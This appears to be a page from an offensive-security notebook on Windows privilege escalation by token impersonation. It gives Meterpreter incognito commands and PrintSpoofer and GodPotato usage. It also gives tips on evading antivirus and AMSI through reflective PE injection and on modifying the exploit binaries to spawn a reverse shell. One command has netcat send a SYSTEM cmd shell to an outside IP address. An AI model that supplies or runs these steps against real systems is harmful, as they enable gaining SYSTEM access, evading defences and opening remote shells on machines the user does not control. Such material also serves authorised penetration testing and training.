Impersonate Token

Meterpreter Incognito

meterpreter > load incognito

#list all tokens
meterpreter > list_tokens -u

#impersonate token
impersonate_token <complete username>

SeImpersonatePrivileges

If there is antivirus and you able to bypass AMSI, better use Invoke-ReflectivePEInjection to perform printspoofer.exe or godpotato.exe

But the tricky part is when the exe need arguments, so the tips is modified the exe and remove the arguments by directly execute to a revershell or something else.

This meterpreter will make your live easier:

https://hacker-mind.gitbook.io/hacker-mind/metasploit/meterpreter-tricks#manage-multi-session

whoami /priv

# SeImpersonatePrivileges

PrintSpoofer

use this -> https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0

If you have an interactive shell, you can create a new SYSTEM process in your current console.

Use case: bind shell, reverse shell, psexec.py, etc.

.\PrintSpoofer64.exe -i -c cmd

If you can execute commands but you don't have an interactive shell, you can create a new SYSTEM process and exit immediately without interacting with it.

Use case: WinRM, WebShell, wmiexec.py, smbexec.py, etc.

.\PrintSpoofer64.exe -c "C:\Windows\Tasks\nc64.exe 10.10.13.37 1337 -e cmd"

God Potato (latest one)

GitHub - BeichenDream/GodPotatoGitHub

.\GodPotato-NET4.exe -cmd "cmd /c whoami"

reference:

https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens

Windows Privilege Escalation — Token Impersonation(SeImpersonatePrivilege)Medium

GitHub - dievus/printspooferGitHub

Other Privileges

https://github.com/daem0nc0re/PrivFu/tree/main/PrivilegedOperations

PreviousPage NextPivoting

Last updated 1 year ago